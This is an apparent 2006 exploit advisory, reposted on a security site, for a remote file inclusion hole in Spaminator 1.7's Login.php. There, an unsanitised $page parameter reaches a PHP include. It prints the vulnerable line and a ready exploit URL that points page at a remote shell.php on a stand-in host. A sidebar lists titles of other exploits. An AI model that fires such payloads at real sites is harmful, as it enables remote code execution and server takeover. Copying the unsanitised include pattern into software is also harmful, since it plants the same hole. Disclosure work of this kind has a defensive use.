exploits , vulnerabilities , articles , Spaminator <= 1.7 (page) Remote File Include Vulnerability

2006-08-10

Spaminator <= 1.7 (page) Remote File Include Vulnerability

Rated as : High Risk

Spaminator 1.7. ($page) Remote File Include
CreW: ToXiC
BuG Found By Drago84

SourcE CodE:
http://freshmeat.net/redir/spaminator/16281/url_tgz/spaminator-1.7.tar.gz

Page Affect is:
/src/Login.php

Problem is
   include "$page.php";

Path :
Declare $page

ExpL:
http://www.site.com/dir_spaminator/src/Login.php?page=http://www.evalsite.com/shell.php?

Greatz:str0ke


securitydot.net - 2006-08-10

Exploits - newest 10 RSS | More

2007-06-15 57268 Hits XOOPS Module Cjay Content 3 Remote File Inclusion Vulnerability
2007-06-15 34199 Hits XOOPS Module XT-Conteudo (spaw_root) RFI Vulnerability
2007-06-15 42418 Hits XOOPS Module XFsection (modify.php) Remote File Inclusion Vulnerability
2007-06-15 29328 Hits Microsoft Office MSODataSourceControl COM-object BoF PoC (0day)
2007-06-13 19768 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (xp sp2)
2007-06-13 16705 Hits Microsoft Speech API ActiveX control Remote BoF Exploit (win2k sp4)
2007-06-13 19403 Hits Safari 3 for Windows Beta Remote Command Execution PoC
2007-06-13 16589 Hits Ace-FTP Client 1.24a Remote Buffer Overflow PoC
2007-06-09 33605 Hits MoviePlay 4.76 .lst File Local Buffer Overflow Exploit
2007-06-09 17230 Hits e-Vision CMS <= 2.02 SQL Injection/Remote Code Execution Exploit